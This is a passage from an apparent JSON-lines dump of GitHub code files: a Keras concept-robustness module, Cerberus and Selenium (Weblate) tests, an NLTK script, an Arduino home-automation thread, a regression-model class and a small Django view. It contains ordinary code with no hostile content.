pass\n\n\n self.model.layers[node_idx].set_weights(occluded_weights)\n\n features = self.model.get_layer(concept_info['layer_name']).output\n exp_features = layers.Conv2D(1,1, name='Expectation')(features)\n model = Model(inputs = self.model.input, outputs=exp_features)\n\n # print (model.summary())\n # for ii in range(len(self.model.layers)):\n # newmodel.layers[ii].set_weights(self.model.layers[ii].get_weights())\n model.layers[-1].set_weights((np.ones((1, 1, len(total_filters), 1)), np.ones(1)))\n\n grad = singlelayercam(model, test_img, \n nclasses = 1, \n save_path = save_path, \n name = concept_info['concept_name'], \n st_layer_idx = -1, \n end_layer_idx = 1 if (len(model.layers) -3) < 0 else -3,\n threshold = 0.5)\n print (\"[INFO: BioExp Concept Identification] Identified Concept {} in layer {}\".format(concept_info['concept_name'], layer_name))\n\n del model\n return grad[0]\n\n\n def _gaussian_sampler_(self, data, size, ax=-1):\n shape = np.mean(data, ax).shape + (size,)\n return lambda: np.std(data, -1)[..., None] * np.random.randn(*list(shape)) + np.mean(data, -1)[..., None] \n # return lambda: np.random.normal(np.mean(data, -1)[..., None], np.std(data, -1)[..., None], size = shape)\n\n\n def _uniform_sampler_(self, data, size, ax=-1):\n shape = np.mean(data, ax).shape + (size,)\n return lambda: np.percentile(data, 10, axis=-1)[..., None] * np.random.rand(*list(shape)) + np.percentile(data, 90, axis=-1)[..., None]\n # return lambda: np.random.uniform(np.percentile(data, 10, axis=-1)[..., None], np.percentile(data, 90, axis=-1)[..., None], size = shape)\n\n\n def concept_distribution(self, concept_info, prior='gaussian'):\n r\"\"\"\n concept_info: {'concept_name', \n 'layer_name', \n 'filter_idxs'}\n\n return: weight_sampler, bias_sampler\n \"\"\"\n\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n\n layer_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n concept_weights = layer_weights[0][:,:,:, node_idxs]\n\n if prior == 'gaussian':\n try:\n concept_biases = layer_weights[1][node_idxs]\n return (self._gaussian_sampler_(concept_weights, len(node_idxs)), self._gaussian_sampler(concept_biases, len(node_idxs)))\n except:\n return (self._gaussian_sampler_(concept_weights, len(node_idxs)))\n elif prior == 'uniform':\n try:\n concept_biases = layer_weights[1][node_idxs]\n return (self._uniform_sampler_(concept_weights, len(node_idxs)), self._gaussian_sampler(concept_biases, len(node_idxs)))\n except: \n return (self._uniform_sampler_(concept_weights, len(node_idxs)))\n else:\n raise NotImplementedError(\"Allowed Priors are ['gaussian', 'uniform']\")\n\n\n def concept_robustness(self, concept_info,\n test_img,\n nmontecarlo = 3,\n base = False,\n prior = 'gaussian',\n compare = False):\n r\"\"\"\n test significance of each concepts\n\n concept: {'concept_name', \n 'layer_name', \n 'filter_idxs'}\n dataset_path: \n save_path:\n loader:\n test_imgs:\n img_ROI:\n \"\"\"\n layer_name = concept_info['layer_name'] \n node_idxs = concept_info['filter_idxs']\n\n self.model.load_weights(self.weights, by_name = True)\n node_idx = self.get_layer_idx(concept_info['layer_name'])\n selected_weights = deepcopy(np.array(self.model.layers[node_idx].get_weights()))\n\n total_filters = np.arange(selected_weights[0].shape[-1])\n test_filters = np.delete(total_filters, node_idxs)\n\n occluded_weights = deepcopy(selected_weights)\n\n if compare: \n true_prediction = self.model.predict(test_img[None, ...])\n delta_scores = []\n\n # weight occlusion\n for j in test_filters:\n occluded_weights[0][:,:,:,j] = 0\n try: occluded_weights[1][j] = 0\n except: pass\n\n filter_idxs = node_idxs if not base else total_filters\n\n # sampler defn\n if prior == 'gaussian':\n weight_sampler = self._gaussian_sampler_(selected_weights[0][:, :, :, filter_idxs], len(node_idxs)) \n try: bias_sampler = self._gaussian_sampler_(selected_weights[1][filter_idxs], len(node_idxs))\n except: pass\n elif prior == 'uniform':\n weight_sampler = self._uniform_sampler_(selected_weights[0][:, :, :, filter_idxs], len(node_idxs)) \n try: bias_sampler = self._uniform_sampler_(selected_weights[1][filter_idxs], len(node_idxs))\n except: pass\n else:\n raise NotImplementedError(\"Allowed Priors are ['gaussian', 'uniform']\")\n \n\n # robustness\n gradlist = []\n\n for _ in range(nmontecarlo):\n occluded_weights[0][:,:,:,node_idxs] = weight_sampler()\n try: occluded_weights[1][node_idxs] = bias_sampler()\n except: pass\n\n self.model.layers[node_idx].set_weights(occluded_weights)\n if compare: \n occluded_prediction = self.model.predict(test_img[None, ...])\n delta_scores.append(np.mean((true_prediction - occluded_prediction)**2))\n\n\n features = self.model.get_layer(concept_info['layer_name']).output\n exp_features = layers.Conv2D(1, 1, name='Expectation')(features)\n model = Model(inputs = self.model.input, outputs=exp_features)\n model.layers[-1].set_weights((np.ones((1, 1, len(total_filters), 1)), np.ones(1)))\n\n nclass_grad = singlelayercam(model, test_img, \n nclasses = 1, \n name = concept_info['concept_name'], \n st_layer_idx = -1, \n end_layer_idx = 1 if (len(model.layers) -3 < 0) else -3,\n threshold = 0.5)\n gradlist.append(nclass_grad[0])\n \n try: del bias_sampler\n except: pass \n del model, weight_sampler\n\n if compare:\n return np.array(gradlist), np.mean(delta_scores)\n return np.array(gradlist)\n\n\n def check_robustness(self, concept_info,\n save_path, \n test_img,\n save_all = False,\n nmontecarlo = 4,\n base = False,\n compare = False,\n prior = 'gaussian'):\n\n actual_grad = self.flow_based_identifier(concept_info,\n save_path = None,\n test_img = test_img)\n montecarlo_grad = self.concept_robustness(concept_info,\n test_img,\n nmontecarlo=nmontecarlo,\n base = base,\n compare = compare,\n prior = prior)\n if compare:\n score = montecarlo_grad[1]\n montecarlo_grad = montecarlo_grad[0]\n print (\"[INFO: BioExp Concept Robustness] Difference in Score {}\".format(score))\n\n if save_path:\n plt.clf()\n if save_all:\n plt.figure(figsize=(5*(nmontecarlo + 2), 5))\n gs = gridspec.GridSpec(1, nmontecarlo + 2)\n gs.update(wspace=0.025, hspace=0.05)\n\n ax = plt.subplot(gs[0])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(actual_grad, cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n \n for ii in range(nmontecarlo):\n if ii == (nmontecarlo - 1): ax = plt.subplot(gs[ii + 1: ])\n else: ax = plt.subplot(gs[ii + 1])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(montecarlo_grad[ii], cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('sampled')\n ax.tick_params(bottom='off', top='off', labelbottom='off')\n else:\n plt.figure(figsize=(5*(3), 5))\n gs = gridspec.GridSpec(1, 3)\n gs.update(wspace=0.025, hspace=0.05)\n\n ax = plt.subplot(gs[0])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(actual_grad, cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n \n ax = plt.subplot(gs[1:])\n im = ax.imshow(np.squeeze(test_img), cmap='gray', vmin=0, vmax=1)\n im = ax.imshow(np.mean(montecarlo_grad, axis=0), cmap=get_transparent_cmap('Greens'), vmin=0, vmax=1)\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n ax.set_aspect('equal')\n ax.set_title('actual')\n ax.tick_params(bottom='off', top='off', labelbottom='off' )\n\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.2)\n cb = plt.colorbar(im, ax=ax, cax=cax )\n os.makedirs(save_path, exist_ok = True)\n plt.savefig(os.path.join(save_path, concept_info['concept_name'] +'_{}_{}_robustness.png'.format('base' if base else 'cluster', prior)), bbox_inches='tight')\n \n return np.mean(montecarlo_grad, axis=0)\n","repo_name":"koriavinash1/BioExp","sub_path":"BioExp/clusters/concept.py","file_name":"concept.py","file_ext":"py","file_size_in_byte":16487,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"95"} +{"seq_id":"1810996652","text":"from cerberus import Validator\n\ndto_schema = dict(\n img=dict(\n type='string',\n empty=False,\n ),\n name=dict(\n type='string',\n ),\n)\n\n\ndef test_empty_doc_is_success():\n document = {}\n assert Validator(dto_schema).validate(document)\n\n\ndef test_unknown_field_make_fail():\n document = {\n \"k\": \"i1\",\n }\n v = Validator()\n assert not v.validate(document, dto_schema)\n assert str(v.errors) == \"{'k': ['unknown field']}\"\n\n\ndef test_allow_unknown():\n document = {\n \"k\": \"i1\",\n }\n v = Validator()\n v.allow_unknown = True\n assert v.validate(document, dto_schema)\n\n\ndef test_empty_not_allowed():\n document = {\n \"img\": \"\",\n }\n v = Validator()\n assert not v.validate(document, dto_schema)\n assert str(v.errors) == \"{'img': ['empty values not allowed']}\"\n\n\ndef test_empty_allowed():\n document = {\n \"img\": \"x\",\n \"name\": \"\",\n }\n v = Validator()\n assert v.validate(document, dto_schema)\n\n\ndef test_root_list():\n schema = dict()\n document = [1, 2, 3]\n v = Validator(schema)\n assert v.validate(document)\n","repo_name":"ddqus/learn-python-using-tdd","sub_path":"test/external/cerberus/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5050542189","text":"from nltk.tag import pos_tag\r\nimport re\r\nimport nltk\r\n\r\ndef tokenize_sentence(sentence):\r\n return re.findall(r\"[\\w']+|[.,!+?;]+\", sentence)\r\n\r\nsentence = \"AAPL refuses maintenance, to working woman\"\r\ntagged_sent = pos_tag(tokenize_sentence(sentence))\r\nprint(tagged_sent)\r\n# [('Michael', 'NNP'), ('Jackson', 'NNP'), ('likes', 'VBZ'), ('to', 'TO'), ('eat', 'VB'), ('at', 'IN'), ('McDonalds', 'NNP')]\r\n\r\npropernouns = [word for word,pos in tagged_sent if pos == 'NNP']\r\nprint(propernouns)\r\n# ['Michael','Jackson', 'McDonalds']\r\n\r\nprint(nltk.help.upenn_tagset())\r\n\r\n# [('Michael', 'NNP'), ('Jackson', 'NNP'), ('likes', 'VBZ'), ('to', 'TO'), ('eat', 'VB'), ('at', 'IN'), ('McDonalds.', 'NNP'), ('How', 'NNP'), ('are', 'VBP'), ('you', 'PRP'), ('doing?', 'VBP')]\r\n\r\n#\r\nindex = 0\r\n","repo_name":"raiprabh/analytics","sub_path":"DataCleaning/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14839618829","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# Title: model.py\n# Author: Romain Gigault\n# Date: 17-Sept-2014\n# Info: Interface for light\nimport serial, time, threading, select\nfrom media.andro.manager import AndroManager\n\nclass ArduinoModel():\n \"\"\"Create a Arduino object for remote control.\"\"\"\n\n def __init__(self,port):\n self.port = port\n self.iface = serial.Serial(port, 9600, timeout=0.1)\n time.sleep(1)\n\n def __exit__(self):\n self.iface.close()\n\n def switch_status(self,device, on_off):\n error = False\n if device != 'bedRoom' and device != 'livingRoom':\n return 'bad device'\n if on_off == 'on':\n if device == 'bedRoom':\n self.iface.write('1')\n elif device == 'livingRoom':\n self.iface.write('3')\n elif on_off == 'off':\n if device == 'bedRoom':\n self.iface.write('0')\n elif device == 'livingRoom':\n self.iface.write('2')\n else:\n error = True\n if error:\n return \"NOK\"\n else:\n return \"OK\"\n\nclass ArduinoThread(threading.Thread):\n \"\"\"Thread class with a stop() method. The thread itself has to check\n regularly for the stopped() condition.\"\"\"\n def __init__(self, iface_address, timer):\n super(ArduinoThread, self).__init__()\n self._stop = threading.Event()\n self.setDaemon = True\n self.anybody_home = False\n self.iface_address = iface_address\n self.timer = timer\n self.last_detected = 0 #Initialize last_detected\n self.last_message_sent = 0 \n day_str = time.strftime(\"%d-%b-%Y\",time.localtime())\n self.sunrise = time.strptime(day_str + \" 08:00\", \"%d-%b-%Y %H:%M\")\n self.sunset = time.strptime(day_str + \" 20:00\", \"%d-%b-%Y %H:%M\")\n self.start()\n\n def stop(self):\n self._stop.set()\n\n def stopped(self):\n return self._stop.isSet()\n\n def run(self):\n arduino_serial = serial.Serial(self.iface_address, 9600, timeout=0.1)\n time.sleep(1)\n as_read,_,_ = select.select([arduino_serial],[],[],7)\n light_triggered = False\n while 1:\n try:\n data = as_read[0].readline()\n except:\n #if programs falls here, it means that did not return the serial link, try to bound it again\n data = ''\n as_read,_,_ = select.select([arduino_serial],[],[],7)\n #print(\"Trying to bound again with Serial\")\n pass\n if data != '':\n self.anybody_home = True\n self.last_detected = time.time()\n else:\n #Clear the flag to avoid getting old notification \n self.anybody_home = False\n #print(\"Someone detected at \" + time.strftime(\"%d-%b-%Y %H:%M\",time.localtime(self.last_detected)))\n if self.anybody_home:\n if (time.time() - self.last_message_sent > self.timer*60):#TODO correct this, it should send a signal when someone is detected and not wait the timer\n #print(\"Sending message to Andro...\")\n AndroManager().send_notification(title='Someone%20at%20home', text = \"Detected%20at%20\" + time.strftime(\"%d-%b-%Y---%H:%M\",time.localtime(self.last_detected)),id=\"sbdy_detected\",led_color=\"red\",led_on=\"5000\",led_off=\"2000\")\n self.anybody_home = False\n self.last_message_sent = time.time()\n self.last_detected = 0\n #if self.check_sunrise_sunset():\n # if not light_triggered:\n # #Trigger light and remember command\n # print (\"Triggering light...\")\n # ArduinoModel(self.iface_address).switch_status(\"livingRoom\",\"on\")\n # light_triggered = True\n #if light_triggered and (time.time() - self.last_detected > 1*60):\n # print (\"Killing light...\")\n # ArduinoModel(self.iface_address).switch_status(\"livingRoom\",\"off\")\n # light_triggered = False\n # self.anybody_home = False\n #TODO create a switch to avoid lightening up if it is not required\n\n #Exit the loop if thread was asked to stop\n if(self.stopped()):\n del(arduino_serial)\n return\n\n def update_timer(self):\n self.timer = time.time() #Get actual time\n\n def check_sunrise_sunset(self):\n now = time.localtime()\n #print(\"Sunrise : \" + time.strftime(\"%d-%b-%Y %H:%M\", self.sunrise))\n #print(\"Now : \" + time.strftime(\"%d-%b-%Y %H:%M\", now))\n #print(\"Sunset : \" + time.strftime(\"%d-%b-%Y %H:%M\", self.sunset))\n if(self.sunrise < now and now < self.sunset):\n return False\n else:\n return True\n\n def update_sun_times(self):\n #TODO write a parser to get sun time via a webservic\n return False","repo_name":"Romalouz/Automation","sub_path":"media/arduino/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"23560219622","text":"import sys\nfrom collections import deque\n\nread = sys.stdin.readline\n\n\ndef main():\n N = int(read().rstrip())\n Q = deque([1, 2, 3, 4, 5, 6, 7, 8, 9])\n res = [i for i in range(10)]\n\n # 한 자리 수이면 바로 출력하고 종료\n if N < 10:\n print(res[N])\n return\n\n # 큐가 빌 때까지 계속 반복\n while len(Q) != 0:\n if len(res) >= N + 1: # 0이 포함되어 있으므로 N번째를 구했으면 길이는 N + 1이 됨\n break\n\n x = Q.popleft()\n # 1의 자리보다 하나 작은 수 까지만 반복. 그래야 감소하는 수가 됨. 예를 들어 x가 96 이면 0~5까지만 붙을 수 있음\n for i in range(x % 10):\n # x가 96이면 960을 만든 후 i를 1의자리에 붙이면 감수하는 수가 됨.\n Q.append(x * 10 + i)\n res.append(x * 10 + i)\n\n # 감소하는 수 개수가 N 만큼 안나왔으면 불가능한 경우\n if len(res) < N + 1:\n print(-1)\n else:\n\n print(res[N])\n\n\nif __name__ == '__main__':\n main()","repo_name":"DONGWANKOH/Phthon_Study","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29000384217","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.wrappers.scikit_learn import KerasRegressor\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.feature_selection import VarianceThreshold\nfrom tensorflow.keras import backend as K\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.metrics import mean_squared_log_error\nfrom Preprocessor import Preprocessor\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import RidgeCV\nfrom sklearn.model_selection import RepeatedKFold\nimport xgboost\nimport lightgbm as lgbm\nfrom flaml import AutoML\nimport json\n\n\ndef root_mean_squared_log_error(y_true, y_pred):\n y_pred = np.abs(y_pred)\n return mean_squared_log_error(y_true, y_pred) ** 0.5\n\n\ndef custom_metric(X_test, y_test, estimator, labels, X_train, y_train,\n weight_test=None, weight_train=None, config=None, groups_test=None, groups_train=None):\n y_pred = estimator.predict(X_test)\n test_loss = root_mean_squared_log_error(y_test, y_pred)\n y_pred = estimator.predict(X_train)\n train_loss = root_mean_squared_log_error(y_train, y_pred)\n alpha = 0.5\n return test_loss * (1 + alpha) - alpha * train_loss, {}\n\n\nclass TestModel:\n\n def __init__(self, x_train, y_train):\n self.model = None\n self.x_train = x_train\n self.y_train = y_train\n\n \"\"\"\n This function is used just for showing that trying to predict the price based on the total area alone will\n not be good enough for an accurate prediction\n \"\"\"\n\n def predict_linearly(self, m, b, data):\n predictions = []\n for _, row in data.iterrows():\n price = m * row[\"area_total\"] + b\n if price < 0:\n price = 0\n predictions.append((int(row[\"id\"]), price))\n return pd.DataFrame(predictions, columns=[\"id\", \"price\"])\n\n \"\"\"\n Main function for training the model. Will use the dataset partition selected in the constructor to\n fit a KerasRegressor model. The trained model is bound to self.model.\n \"\"\"\n\n def fit(self):\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('selector', VarianceThreshold()))\n # Set paramters for Grid Search\n # param_grid = {'n_estimators': [200, 300, 400, 500, 600],\n # 'max_features': [0.1, 0.3, 0.6]\n # }\n # Initialise the random forest model\n #rf = RandomForestRegressor(n_jobs=-1, random_state=0, bootstrap=True)\n\n # Initialise Gridsearch CV with 5 fold corssvalidation and neggative root_mean_squared_error\n # tuned_rf = GridSearchCV(\n # estimator=rf, param_grid=param_grid, scoring='neg_root_mean_squared_error', cv=5, verbose=2)\n\n # rf = RandomForestRegressor(bootstrap=True,\n # max_depth=40,\n # max_features='auto',\n # min_samples_leaf=2,\n # min_samples_split=5,\n # n_estimators=100, verbose=2)\n #estimators.append(('rfr', rf))\n #gr = GradientBoostingRegressor(n_estimators=500, learning_rate=0.5)\n #estimators.append((\"gradient\", gr))\n params = {'n_estimators': 1168, 'num_leaves': 118, 'min_child_samples': 7, 'learning_rate': 0.08071528250529435,\n 'log_max_bin': 10, 'colsample_bytree': 0.662586923419352, 'reg_alpha': 0.0031039225181313645, 'reg_lambda': 0.05061507015311157}\n boost = xgboost.XGBRegressor(**params)\n estimators.append((\"boost\", boost))\n self.model = Pipeline(estimators)\n #self.model = rf\n return self.model.fit(self.x_train, self.y_train)\n #print(\"Best params:\", grid_search.best_params_)\n\n def keras_mlp_model(self, epochs=100, batch_size=10, verbose=0):\n estimators = []\n estimators.append(('standardize', StandardScaler()))\n estimators.append(('selector', VarianceThreshold()))\n estimators.append(('mlp', KerasRegressor(\n build_fn=self.generate_model, epochs=epochs, batch_size=batch_size, verbose=verbose)))\n return Pipeline(estimators)\n\n def randomforest_model(self):\n rf = RandomForestRegressor()\n return rf\n\n def xgboost_model(self, params = {},):\n boost = xgboost.XGBRegressor(**params)\n return boost\n\n def lgbm_model(self, params = {},):\n lightgbm = lgbm.LGBMRegressor(**params)\n return lightgbm\n\n def start_rf_search(self, params, load=False):\n if load:\n with open(\"rf_best.json\", \"r+\") as file:\n best = json.load(file)\n return RandomForestRegressor(**best)\n else:\n rf = RandomForestRegressor()\n finished = GridSearchCV(\n estimator=rf, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def start_xgboost_search(self, params, load=False):\n if load:\n with open(\"boost_best.json\", \"r+\") as file:\n best = json.load(file)\n return xgboost.XGBRegressor(**best)\n else:\n boost = xgboost.XGBRegressor()\n finished = GridSearchCV(\n estimator=boost, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def start_lgbm_search(self, params, load=False):\n if load:\n with open(\"lgbm_best.json\", \"r+\") as file:\n best = json.load(file)\n return lgbm.LGBMRegressor(**best)\n else:\n lg = lgbm.LGBMRegressor()\n finished = GridSearchCV(\n estimator=lg, param_grid=params, cv=3, verbose=2, n_jobs=-1)\n return finished\n\n def autoMLfit(self, x_train, y_train, estimator_list=[\"xgboost\", \"lgbm\", \"rf\"], time=10, metric=custom_metric, ensemble=False):\n automl_settings = {\n \"time_budget\": time, # in seconds\n \"metric\": metric,\n \"task\": 'regression',\n \"log_file_name\": \"lmaoxd.log\",\n \"estimator_list\": estimator_list,\n \"ensemble\": ensemble,\n }\n automl = AutoML()\n self.model = automl\n return self.model.fit(x_train, y_train, **automl_settings)\n\n def autoMLpredict(self, x_test):\n return self.model.predict(x_test)\n\n def autoML_print_best_model(self):\n print(\"best model\", self.model.best_estimator)\n print(\"configs\", self.model.best_config)\n\n \"\"\"\n Predicts the prices for the given data\n \"\"\"\n\n def predict(self, data):\n return self.model.predict(data)\n\n \"\"\"\n Returns a keras neural network model to be used for training and predictions\n \"\"\"\n\n def generate_model(self):\n model = tf.keras.models.Sequential()\n model.add(tf.keras.layers.Dense(\n units=64, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=128, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=64, activation=\"relu\"))\n model.add(tf.keras.layers.Dense(units=1))\n model.compile(optimizer='adam', loss=self.loss)\n return model\n\n \"\"\"\n RMSLE (Root mean squared log error) - used as a loss function for the model\n \"\"\"\n\n def loss(self, y_true, y_pred):\n msle = tf.keras.losses.MeanSquaredLogarithmicError()\n return K.sqrt(msle(y_true, y_pred))\n\n \"\"\"\n Calculates the RMSLE over the whole prediction set\n \"\"\"\n\n def root_mean_squared_log_error(self, y_true, y_pred):\n return mean_squared_log_error(y_true, y_pred) ** 0.5\n\n \"\"\"\n Method used for saving the actual predictions to file\n \"\"\"\n\n def save_predictions(self, pred):\n zipped = [(23285+i, pred[i]) for i in range(len(pred))]\n result = pd.DataFrame(zipped, columns=[\"id\", \"price_prediction\"])\n result.to_csv(\"../results/predictions.csv\", index=False)\n return result\n\n\ndef main():\n preprocessor = Preprocessor()\n\n labels = preprocessor.apartments[\"price\"]\n merged = preprocessor.merged\n merged_test = preprocessor.merged_test\n\n training_data = preprocessor.preprocess(merged)\n training_data.drop(\"price\", 1, inplace=True)\n test_data = preprocessor.preprocess(merged_test)\n\n model = TestModel(training_data, labels)\n model.fit()\n\n test_pred = model.predict(model.x_test)\n test_labels = model.y_test.to_numpy()\n\n fig, ax = plt.subplots()\n ax.scatter(test_labels, test_pred)\n ax.plot([test_labels.min(), test_labels.max()], [\n test_labels.min(), test_labels.max()], 'k--', lw=4)\n ax.set_xlabel('Measured')\n ax.set_ylabel('Predicted')\n plt.show()\n\n res = pd.DataFrame([(test_labels[i], test_pred[i]) for i in range(\n len(test_pred))], columns=[\"actual\", \"prediction\"])\n print(\"RMLSE: %s\" % model.root_mean_squared_log_error(test_labels, test_pred))\n res.to_csv(\"split.csv\", index=False)\n\n pred = model.predict(test_data)\n model.save_predictions(pred)\n\n\n# main()\n","repo_name":"Olaussen/TDT4173_group69","sub_path":"src/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15164557385","text":"from django.shortcuts import render, redirect\nfrom .models import *\n\ndef index(request):\n context = {\n 'courses': Course.objects.all()\n }\n return render(request, 'course.html', context)\n\ndef create(request):\n Course.objects.create(\n name = request.POST['name'],\n description = request.POST['description']\n )\n return redirect('/courses')\n\ndef show(request, id):\n if request.method == 'GET':\n context = {\n \"course\": Course.objects.get(id=id)\n }\n return render(request, 'destroy.html', context)\n\ndef destroy(request, id):\n if request.method == 'GET':\n context = {\n \"course\": Course.objects.get(id=id)\n }\n return render(request, 'destroy.html', context)\n\n if request.method == 'POST':\n courses = Course.objects.get(id=id)\n courses.delete() \n return redirect('/courses')\n\n","repo_name":"DrieuSpong/courses","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41453585834","text":"\"\"\"Find Maximum and Minimum:\r\nDescription: Write a program to find the maximum and minimum numbers in a given list.\r\nExample:\r\nInput: [4, 9, 2, 7, 5]\r\nOutput: Maximum: 9, Minimum: 2\"\"\"\r\n\r\nlist= [4,9,2,7,5]\r\nmax_num=list[0]\r\nmin_num=list[0]\r\nfor num in list:\r\n if max_num 0:\n self.driver.execute_script(\n \"window.scrollBy(%d,%d)\" % (0, window_height)\n )\n screenshots.append(Image.open(BytesIO(self.driver.get_screenshot_as_png())))\n if not scroll:\n scroll_height = window_height\n break\n\n # Create final image\n stitched = Image.new(\"RGB\", (scroll_width, scroll_height))\n\n # Stitch images together\n for i, img in enumerate(screenshots):\n offset = i * window_height\n\n # Remove overlapping area from last screenshot\n if i > 0 and i == num - 1:\n overlap_height = img.height - scroll_height % img.height\n else:\n overlap_height = 0\n\n stitched.paste(img, (0, offset - overlap_height))\n\n stitched.save(os.path.join(self.image_path, name))\n\n self.scroll_top()\n\n def click(self, element=\"\", htmlid=None):\n \"\"\"Wrapper to scroll into element for click.\"\"\"\n if htmlid:\n element = self.driver.find_element(By.ID, htmlid)\n if isinstance(element, str):\n element = self.driver.find_element(By.LINK_TEXT, element)\n\n try:\n element.click()\n except ElementNotVisibleException:\n self.actions.move_to_element(element).perform()\n element.click()\n\n def clear_field(self, element):\n element.send_keys(Keys.CONTROL + \"a\")\n element.send_keys(Keys.DELETE)\n return element\n\n def do_login(self, create=True, superuser=False):\n # login page\n with self.wait_for_page_load():\n self.click(htmlid=\"login-button\")\n\n # Create user\n if create:\n user = create_test_user()\n if superuser:\n user.is_superuser = True\n user.save()\n user.profile.language = \"en\"\n user.profile.save()\n user.profile.languages.set(\n Language.objects.filter(code__in=(\"he\", \"cs\", \"hu\"))\n )\n else:\n user = None\n\n # Login\n username_input = self.driver.find_element(By.ID, \"id_username\")\n username_input.send_keys(\"weblate@example.org\")\n password_input = self.driver.find_element(By.ID, \"id_password\")\n password_input.send_keys(\"testpassword\")\n\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.XPATH, '//input[@value=\"Sign in\"]'))\n return user\n\n def open_manage(self, login=True):\n # Login as superuser\n if login:\n user = self.do_login(superuser=True)\n else:\n user = None\n\n # Open admin page\n with self.wait_for_page_load():\n self.click(htmlid=\"admin-button\")\n return user\n\n def open_admin(self, login=True):\n user = self.open_manage(login)\n with self.wait_for_page_load():\n self.click(\"Tools\")\n with self.wait_for_page_load():\n self.click(\"Django admin interface\")\n return user\n\n def test_failed_login(self):\n self.do_login(create=False)\n\n # We should end up on login page as user was invalid\n self.driver.find_element(By.ID, \"id_username\")\n\n def test_login(self):\n # Do proper login with new user\n self.do_login()\n\n # Load profile\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n\n # Wait for profile to load\n self.driver.find_element(By.ID, \"notifications\")\n\n # Load translation memory\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"memory-button\")\n\n self.screenshot(\"memory.png\")\n\n # Finally logout\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"logout-button\")\n\n # We should be back on home page\n self.driver.find_element(By.ID, \"browse-projects\")\n\n def register_user(self):\n # registration page\n with self.wait_for_page_load():\n self.click(htmlid=\"register-button\")\n\n # Fill in registration form\n self.driver.find_element(By.ID, \"id_email\").send_keys(\"weblate@example.org\")\n self.driver.find_element(By.ID, \"id_username\").send_keys(\"test-example\")\n self.driver.find_element(By.ID, \"id_fullname\").send_keys(\"Test Example\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.XPATH, '//input[@value=\"Register\"]'))\n\n # Wait for registration email\n loops = 0\n while not mail.outbox:\n time.sleep(1)\n loops += 1\n if loops > 20:\n break\n\n return self.assert_registration_mailbox()\n\n @override_settings(REGISTRATION_CAPTCHA=False)\n def test_register(self, clear=False):\n \"\"\"Test registration.\"\"\"\n url = self.register_user()\n\n # Delete all cookies\n if clear:\n try:\n self.driver.delete_all_cookies()\n except WebDriverException as error:\n # This usually happens when browser fails to delete some\n # of the cookies for whatever reason.\n warnings.warn(f\"Ignoring: {error}\")\n\n # Confirm account\n self.driver.get(url)\n\n # Check we got message\n self.assertTrue(\n \"You have activated\" in self.driver.find_element(By.TAG_NAME, \"body\").text\n )\n\n # Check we're signed in\n self.click(htmlid=\"user-dropdown\")\n self.assertTrue(\n \"Test Example\" in self.driver.find_element(By.ID, \"profile-name\").text\n )\n\n def test_register_nocookie(self):\n \"\"\"Test registration without cookies.\"\"\"\n self.test_register(True)\n\n 